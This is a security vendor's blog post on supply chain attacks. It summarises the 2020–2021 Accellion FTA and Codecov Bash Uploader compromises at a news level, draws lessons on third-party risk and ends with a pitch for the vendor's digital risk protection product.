Examine our research from the last year in the ReliaQuest 2024 Annual Cyber-Threat Report
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
March 26, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
If you’ve performed any recent research about supply chain attacks, it becomes apparent rather quickly that after ransomware (itself also a cause in several cases), these attacks are a growing trend to feel strongly about. There’s a solid case to be made about an overall trend we’ve already seen with ransomware, that so-called “big game hunting” is the norm now with each attack designed for maximum impact, and attacks on the supply chain fit the bill.
Back in May, Wired did a great job explaining the problem with supply chain attacks. Essentially, instead of a frontal assault on one network, it’s finding a weak point elsewhere that allows access at a one-to-many scale. Adversaries are banking on someone somewhere not having the most robust security policies or best practices in place, and they get the benefit of rolling for the initiative first, so to speak. A study this year from ENISA, the EU’s cybersecurity agency, echoes a lot of this same concern. Even more troubling, there was a significant gap in knowledge around how attacks even occurred in a large majority of incidents.
There’s also a profound psychological aspect to this: The thought of not trusting even the legitimate software you purchased introduces some percentage of doubt into everyone’s mind. With a supply chain attack, this time, it’s not just malicious code attacking with obvious ties to threat actors; it’s now worrying about whether your vendor’s code is secure. In some cases, it also comes down to trusting your vendor’s vendor is also doing the right thing. It also burdens everyone with checking the code, and, as ENISA put it: “customers demand products that are more cyber secure but that remain at a low cost, two needs that it is not always possible to reconcile.” Rightfully so, we’re all taking a giant leap of faith every day, logging into our home and work networks.
The concept itself is not new, as we’ve seen just in the past decade with attacks on both well-known and relatively obscure applications and vendors. You know it’s significant when the name of a small provider or niche application suddenly becomes a household name in the media. Outside of the big IT world and, more specifically, in the hosting space, who knew what Kaseya was before July 2021? The more recent public arc of this story might’ve started back with the Adobe breach in 2013, continued with the CCleaner attack, and most recently, the SolarWinds breach, with many victims in between. The difference between these case studies and previous ones was that recent attacks have the marks of criminal actors rather than traditional nation-state APTs.
This year alone, there have been several newsworthy attacks that deserve some attention. We’ll spare you a couple of stories since Kaseya and SolarWinds have been done ad nauseam at this point. Instead, we’ll pull together a couple of significant case studies to walk you through what we know now after time has passed and hopefully glean some lessons from them.
By all accounts, things came to light about this attack around February 2021, but the attack on Accellion occurred at the end of 2020. Accellion was the maker behind the decades-old FTA (File Transfer Appliance) product, used for file transfer, that was to reach End-of-Life (EoL) status by April 2021. Because of the EoL, Accellion was actively moving customers to other applications and services with different codebases.
Attackers were able to leverage four zero-day vulnerabilities to gain access to an FTA server and deploy a web shell to exfiltrate customer information from multiple databases. Accellion gave notice about the breach and assured customers that patches had been released. Still, as the world discovered by February and over the following months, the damage had been done. Out of about 300 users of the software, 100 had some measure of impact from the attack, with another 25 of those experiencing significant data loss.
Looking at some of the victims involved, one of them a leading cybersecurity firm, it’s likely that they were doing many of the right things in terms of security practices on their own networks. However, they probably never saw a weak point in a trusted third-party application that perhaps had some level of privileged access and was already on its way out.
This attack was significant because this was the first of several large attacks involving Clop ransomware. Already a player since the end of 2019, this was, for lack of better words, their breakthrough event. There were also several significant tactics changes observed in this incident in terms of the actors.
At the time, Bleeping Computer wrote about accounts of Clop operators emailing victims directly whose information was found in stolen data, with the thought that victims contacting affected companies would add pressure to ransom demands. Furthermore, in another change of tactics, the attackers in this incident skipped the usual double extortion method, which sees ransom for encryption demands, and went straight for data extortion. This was to be a later hallmark of actors such as Marketo.
The lesson from this attack was that despite an application nearing EoL, it’s still important to ensure code stays secure until retired or deprecated. Also, it’s important to note that some of the low-and-slow tactics, technical proficiency, and use of zero-days signaled the end of ideas that criminal groups didn’t operate at nation-state levels. This clearly shows that criminal groups could perform on par with any of the professional APTs out there but without the geopolitical constraints, those groups have.
In April 2021, news emerged around an attack on Codecov, a popular software testing vendor for developers hosting code on various online repositories. At the end of January 2021, attackers were able to leverage weak security on a Docker image creation process to gain access to Codecov’s Bash Uploader script. Once inside, attackers then modified code to capture end-user information such as repository URLs, raw code, credentials, tokens, and keys. In practice, attackers leveraged the compromised script to push malicious code to customers and intercepted customer credentials to conduct further attacks. With well over 29,000 customers using Codecov, the potential of this turning into a very deep watering hole attack was very real.
Once Codecov discovered the problem, they engaged the public, updated their code, took affected servers offline, and worked with incident response firms to resolve the attack. A long-running NodeJS project to replace their Bash Uploader was announced in June 2021, which was set to replace the Bash process by February 2022, according to Bleeping Computer. Codecov encouraged any customers using the online service to update their login processes and check their code. Users of self-hosted Codecov instances were likely not affected, but according to media reporting at the time, several executives speaking anonymously stated they would also be reviewing their accounts in an abundance of caution.
The scary part about this breach is there is yet to be any public statement regarding attribution or conclusion of the investigation. By the end of April 2021, US Federal law enforcement agencies were reportedly investigating the matter, but in the typical Department of Justice form, there has been no comment as of August 2021. In previous supply chain attacks, the complete truth sometimes wasn’t known until weeks or even months after. Attackers in possession of customer credentials could very well still be in those networks, quietly reconnoitering, creating new accounts, escalating privileges, and further poisoning the well downstream.
As of the time of this writing, speculation across the web pointed towards a likely nation-state actor, given the speed of movement to capture customer information and technical proficiency displayed. A backdoor into victim networks with such a large group of potential victims that could serve national political or economic interests would be in the realm of a nation-state APT. However, as we’ve seen previously with initial access brokers and the criminal underground, it may also be a question of supply and demand.
This was yet another case of a tiny weak point causing havoc for downstream users. In this case, an overlooked security process to create Docker images allowed all of this to happen. To add insult to injury, the way Bash Uploader worked meant that downstream customers sending code to Codecov needed to trust the server itself, in addition to the code. The customer who reported the problem to Codecov noticed that the checksums had changed between versions of code, which led to the investigation. Had that customer not seen those changes, who knows how long it would’ve taken to discover, if at all? With attackers in control of the server and the processes running, it would’ve been a boon for them.
Given the prominence of some of the affected customers mentioned, among them popular software and hardware developers and security companies, this was a case again of enterprises likely doing the right thing within their own networks but having the failure come from a trusted partner. Moves toward a more secure platform with NodeJS and other added features were good moves and well-timed, but it highlights the risks with using open-source and third parties.
In the wake of these significant incidents in just the first half of 2021, time will tell what further fallout we may be seeing this same time in 2022. There’s a pretty good chance we may see ripples from these or future attacks, and we’ll be back writing about what happened and what could’ve gone better. The reliance on third parties is not going away anytime soon as businesses outsource expertise to save time and money. As more diverse services come online and businesses expand, the attack surface for any organization will likely grow.
One key point from the ENISA study was that even though an organization may be well-defended on its estate, there may still be a vulnerable supply chain. Organizations need to perform due diligence on their partners, as well as the shared infrastructure and accesses required for vendor products and services. The hard part is there is no one good way to do all of this, especially on your own, and it requires a holistic view of the threats to the business and the daily exposures to risk.
Although we’re by no means the silver bullet here, Digital Shadows (now ReliaQuest) can help provide a view of risk from suppliers. If you’re curious about how we can help in the fight against these kinds of attacks, take a look at Search Light (now ReliaQuest GreyMatter Digital Risk Protection) for a week to see how intelligence can help, or request a demo.